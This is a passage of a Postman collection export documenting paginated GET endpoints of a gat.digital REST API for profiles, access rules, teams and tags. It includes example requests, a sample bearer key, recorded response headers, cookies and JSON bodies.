specified, <strong>size</strong> will be 30 and <strong>page</strong> will be 0 by default. You can retrieve at most 200 records at once. If there are more than 200 Profiles on the Database, you will need to get the remainder ones specifying the next <strong>pages</strong>.</p>\n","urlObject":{"protocol":"https","path":["api","v1","profiles"],"host":["<instance>"],"query":[{"description":{"content":"<p>[optional] How many results you want. Default is 30. Max is 200.</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[optional] Which page you want to retrieve.</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"700d68d0-5419-4056-9fda-98c04c06bae1","name":"Get the first 30 Profiles","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":{"raw":"https://subdomain.gat.digital/api/v1/profiles?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","profiles"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200."},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:39:01 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01ifr3q0xcuete1dj3llxi5nzrt10107.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01w4gj51yq85hs1fglrmsf005po10115.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=9371a8d1-6db6-40cf-b163-4c7420afc8b5;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01w4gj51yq85hs1fglrmsf005po10115.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"9371a8d1-6db6-40cf-b163-4c7420afc8b5","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"content\":[{\"profile_id\":\"577ad992f5897949670a6e2f\",\"profile_name\":\"MASTER\"},{\"profile_id\":\"59ccf3bce03dd800655d360e\",\"profile_name\":\"Analyst\"},{\"profile_id\":\"59ccf3f6e03dd800655d367a\",\"profile_name\":\"Viewer\"}],\"pageable\":{\"sort\":{\"sorted\":true,\"unsorted\":false},\"pageSize\":30,\"pageNumber\":0,\"offset\":0,\"paged\":true,\"unpaged\":false},\"totalPages\":1,\"totalElements\":3,\"last\":true,\"first\":true,\"sort\":{\"sorted\":true,\"unsorted\":false},\"numberOfElements\":3,\"size\":30,\"number\":0}"}],"_postman_id":"297860fe-eeaf-405b-8f67-e813f071e66a"},{"name":"Profile by ID","id":"6cdd23a6-3346-44b0-b366-976ab862fbdb","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://<instance>/api/v1/profiles/<profile_id>","description":"<p>This endpoint allows you to retrieve a single Profile, specifying its ID. If there is no active Profile with the specified ID, the server will respond with a 204: No Content.</p>\n","urlObject":{"protocol":"https","path":["api","v1","profiles","<profile_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"c0ea768f-4f65-44aa-a250-5c921166543c","name":"Try to get a wrong Profile","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://subdomain.gat.digital/api/v1/profiles/577ad992f589794000000000"},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:40:15 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0y8azvu2uml2tqd7j76lyr2h210118.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01gpfx0rkojt0b1j2xodruhr9gp10119.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=0bec7b31-24b8-486d-8371-9132094cddbe;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01gpfx0rkojt0b1j2xodruhr9gp10119.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"0bec7b31-24b8-486d-8371-9132094cddbe","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"9a8099dc-7145-44c2-b9d7-e8d5cb498359","name":"Get a Profile","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://subdomain.gat.digital/api/v1/profiles/577ad992f5897949670a6e2f"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:39:53 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node01w4gj51yq85hs1fglrmsf005po10115.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0y8azvu2uml2tqd7j76lyr2h210118.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=5a74428c-42df-4914-a846-1933c9f0e49e;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0y8azvu2uml2tqd7j76lyr2h210118.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"5a74428c-42df-4914-a846-1933c9f0e49e","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"profile_id\":\"577ad992f5897949670a6e2f\",\"profile_name\":\"MASTER\"}"}],"_postman_id":"6cdd23a6-3346-44b0-b366-976ab862fbdb"}],"id":"c76f2170-84c1-41e5-bc9f-26654ae71d8a","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"17e44db4-7b22-4606-b2bd-b90f6512da8d"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"0adecf07-161d-48c6-897c-9954d3982ba5"}}],"_postman_id":"c76f2170-84c1-41e5-bc9f-26654ae71d8a","description":""},{"name":"Regras de Acesso","item":[{"name":"Access Rules","id":"1cab997c-2c60-409e-bd0a-40ce293ed998","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/access-rules?size=30&page=0","description":"<p>This endpoint allows you to retrieve the active Access Rules on the database. It uses pagination, with parameters <strong>size</strong> and <strong>page</strong>. If none is specified, <strong>size</strong> will be 30 and <strong>page</strong> will be 0 by default. You can retrieve at most 200 records at once. If there are more than 200 Access Rules on the Database, you will need to get the remainder ones specifying the next <strong>pages</strong>.</p>\n","urlObject":{"protocol":"https","path":["api","v1","access-rules"],"host":["<instance>"],"query":[{"description":{"content":"<p>[optional] How many results you want. Default is 30. Max is 200.</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[optional] Which page you want to retrieve.</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"5dcbd918-c7d2-4eb2-aae2-8c149065995e","name":"Get the first 30 Access Rules","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":{"raw":"https://subdomain.gat.digital/api/v1/access-rules?size=30&page=0","protocol":"https","host":["subdomain","gat","digital"],"path":["api","v1","access-rules"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200."},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:43:19 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node018b4yfv1o3qge1l0e1f4yhw20510122.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0qy8la98tgxpr6h688dxsaoqu10140.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=6d82e783-b26f-4d53-b3c3-c04a43c21cc2;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0qy8la98tgxpr6h688dxsaoqu10140.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"6d82e783-b26f-4d53-b3c3-c04a43c21cc2","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"content\":[{\"asset\":[\"5d080f3ac569d501433592a0\"],\"access_rule_id\":\"5d0a49e2c569d5014335b299\",\"access_rule_name\":\"View Only 'My Company' Web App\"},{\"range\":[\"192.168.1.0/24\"],\"access_rule_id\":\"5d0a4a02c569d5014335b29a\",\"access_rule_name\":\"View Only Workstation Range\"}],\"pageable\":{\"sort\":{\"sorted\":true,\"unsorted\":false},\"pageSize\":30,\"pageNumber\":0,\"offset\":0,\"paged\":true,\"unpaged\":false},\"totalPages\":1,\"totalElements\":2,\"last\":true,\"first\":true,\"sort\":{\"sorted\":true,\"unsorted\":false},\"numberOfElements\":2,\"size\":30,\"number\":0}"}],"_postman_id":"1cab997c-2c60-409e-bd0a-40ce293ed998"},{"name":"Access Rule by ID","id":"3d6bda9a-a38d-4025-b936-ff3577f9ecb4","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://<instance>/api/v1/access-rules/<access-rule_id>","description":"<p>This endpoint allows you to retrieve a single Access Rule, specifying its ID. If there is no active Access Rule with the specified ID, the server will respond with a 204: No Content.</p>\n","urlObject":{"protocol":"https","path":["api","v1","access-rules","<access-rule_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[{"id":"eb038fb8-9564-455a-8eb8-6b0a2006230f","name":"Try to get a wrong Access Rule","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://subdomain.gat.digital/api/v1/access-rules/5d0a49e2c569d50000000000"},"status":"No Content","code":204,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:44:43 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0116rrcku7gp3k1et3s3f2pht7n10143.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node01p7byls10ziojb8g1f2vajmks10144.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=2572560d-f994-4403-beb0-3844cf2da46e;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node01p7byls10ziojb8g1f2vajmks10144.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"2572560d-f994-4403-beb0-3844cf2da46e","key":"XSRF-TOKEN"}],"responseTime":null,"body":""},{"id":"33ff7198-f62e-4578-8a37-b580003a9e80","name":"Get an Access Rule","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://subdomain.gat.digital/api/v1/access-rules/5d0a49e2c569d5014335b299"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:44:22 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the server"},{"key":"Set-Cookie","value":"JSESSIONID=node0qy8la98tgxpr6h688dxsaoqu10140.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"JSESSIONID=node0116rrcku7gp3k1et3s3f2pht7n10143.node0;Path=/;Secure","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Set-Cookie","value":"XSRF-TOKEN=c643e2ff-c7f4-4244-8f73-19942c00dd26;Path=/","name":"Set-Cookie","description":"an HTTP cookie"},{"key":"Strict-Transport-Security","value":"max-age=63072000; includeSubdomains","name":"Strict-Transport-Security","description":"A HSTS Policy informing the HTTP client how long to cache the HTTPS only policy and whether this applies to subdomains."},{"key":"Transfer-Encoding","value":"chunked","name":"Transfer-Encoding","description":"The form of encoding used to safely transfer the entity to the user. Currently defined methods are: chunked, compress, deflate, gzip, identity."},{"key":"Vary","value":"Accept-Encoding, User-Agent","name":"Vary","description":"Tells downstream proxies how to match future request headers to decide whether the cached response can be used rather than requesting a fresh one from the origin server."},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Content-Type-Options","value":"nosniff","name":"X-Content-Type-Options","description":"The only defined value, \"nosniff\", prevents Internet Explorer from MIME-sniffing a response away from the declared content-type"},{"key":"X-Frame-Options","value":"SAMEORIGIN","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-Frame-Options","value":"DENY","name":"X-Frame-Options","description":"Clickjacking protection: \"deny\" - no rendering within a frame, \"sameorigin\" - no rendering if origin mismatch"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"},{"key":"X-XSS-Protection","value":"1; mode=block","name":"X-XSS-Protection","description":"Cross-site scripting (XSS) filter"}],"cookie":[{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":true,"value":"node0116rrcku7gp3k1et3s3f2pht7n10143.node0","key":"JSESSIONID"},{"expires":"Invalid Date","httpOnly":false,"domain":"homolog.gat.digital","path":"/","secure":false,"value":"c643e2ff-c7f4-4244-8f73-19942c00dd26","key":"XSRF-TOKEN"}],"responseTime":null,"body":"{\"asset\":[\"5d080f3ac569d501433592a0\"],\"access_rule_id\":\"5d0a49e2c569d5014335b299\",\"access_rule_name\":\"View Only 'My Company' Web App\"}"}],"_postman_id":"3d6bda9a-a38d-4025-b936-ff3577f9ecb4"}],"id":"63517dc6-13ef-42d4-b148-04399f272eed","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"20843faf-96ed-41b7-9863-204c426dd2e7"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"2e3aeda0-d54e-4ccc-ac6e-f2caf8e6a4f0"}}],"_postman_id":"63517dc6-13ef-42d4-b148-04399f272eed","description":""},{"name":"Times","item":[{"name":"Teams","id":"997330d7-34a7-4870-a2dc-cbdb605188e2","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/teams?size=30&page=0","description":"<p>This endpoint allows you to retrieve the active Teams on the database. It uses pagination, with parameters <strong>size</strong> and <strong>page</strong>. If none is specified, <strong>size</strong> will be 30 and <strong>page</strong> will be 0 by default. You can retrieve at most 200 records at once. If there are more than 200 Teams on the Database, you will need to get the remainder ones specifying the next <strong>pages</strong>.</p>\n","urlObject":{"protocol":"https","path":["api","v1","teams"],"host":["<instance>"],"query":[{"description":{"content":"<p>[optional] How many results you want. Default is 30. Max is 200.</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[optional] Which page you want to retrieve.</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[],"_postman_id":"997330d7-34a7-4870-a2dc-cbdb605188e2"},{"name":"Team by ID","id":"ba91b35a-8715-4bb7-b7a9-acabb948c387","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463"}],"url":"https://<instance>/api/v1/teams/<team_id>","description":"<p>This endpoint allows you to retrieve a single Team, specifying its ID. If there is no active Team with the specified ID, the server will respond with a 204: No Content.</p>\n","urlObject":{"protocol":"https","path":["api","v1","teams","<team_id>"],"host":["<instance>"],"query":[],"variable":[]}},"response":[],"_postman_id":"ba91b35a-8715-4bb7-b7a9-acabb948c387"}],"id":"02a59b84-f3e0-44dd-9908-b3fb3d197fbe","event":[{"listen":"prerequest","script":{"type":"text/javascript","exec":[""],"id":"afd6b25c-b41b-44ad-92e6-864326ca33be"}},{"listen":"test","script":{"type":"text/javascript","exec":[""],"id":"6390634b-21a3-4afb-be84-ed1d39b1298c"}}],"_postman_id":"02a59b84-f3e0-44dd-9908-b3fb3d197fbe","description":""},{"name":"Tags","item":[{"name":"Tags","id":"780fe17d-1634-4f47-8a8b-24cfc93f19c7","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"<p>Your API Key.</p>\n"}],"url":"https://<instance>/api/v1/tags?size=30&page=0","description":"<p>This endpoint allows you to retrieve the active Tags on the database. It uses pagination, with parameters <strong>size</strong> and <strong>page</strong>. If none is specified, <strong>size</strong> will be 30 and <strong>page</strong> will be 0 by default. You can retrieve at most 200 records at once. If there are more than 200 Tags on the Database, you will need to get the remainder ones specifying the next <strong>pages</strong>.</p>\n","urlObject":{"protocol":"https","path":["api","v1","tags"],"host":["<instance>"],"query":[{"description":{"content":"<p>[optional] How many results you want. Default is 30. Max is 200.</p>\n","type":"text/plain"},"key":"size","value":"30"},{"description":{"content":"<p>[optional] Which page you want to retrieve.</p>\n","type":"text/plain"},"key":"page","value":"0"}],"variable":[]}},"response":[{"id":"e871b1f9-e0a9-4708-a87b-b0f85f01d602","name":"Get the frist 30 Tags","originalRequest":{"method":"GET","header":[{"key":"Content-Type","value":"application/json"},{"key":"Accept","value":"application/json"},{"key":"Authorization","value":"Bearer cf85324e-ef56-499c-80e0-cfd24dbe5463","description":"Your API Key."}],"url":{"raw":"https://instance/api/v1/tags?size=30&page=0","protocol":"https","host":["instance"],"path":["api","v1","tags"],"query":[{"key":"size","value":"30","description":"[optional] How many results you want. Default is 30. Max is 200."},{"key":"page","value":"0","description":"[optional] Which page you want to retrieve."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Connection","value":"keep-alive","name":"Connection","description":"Options that are desired for the connection"},{"key":"Content-Encoding","value":"gzip","name":"Content-Encoding","description":"The type of encoding used on the data."},{"key":"Content-Type","value":"application/json;charset=utf-8","name":"Content-Type","description":"The mime type of this content"},{"key":"Date","value":"Wed, 19 Jun 2019 14:24:19 GMT","name":"Date","description":"The date and time that the message was sent"},{"key":"Expires","value":"Thu, 01 Jan 1970 00:00:00 GMT","name":"Expires","description":"Gives the date/time after which the response is considered stale"},{"key":"Server","value":"nginx","name":"Server","description":"A name for the 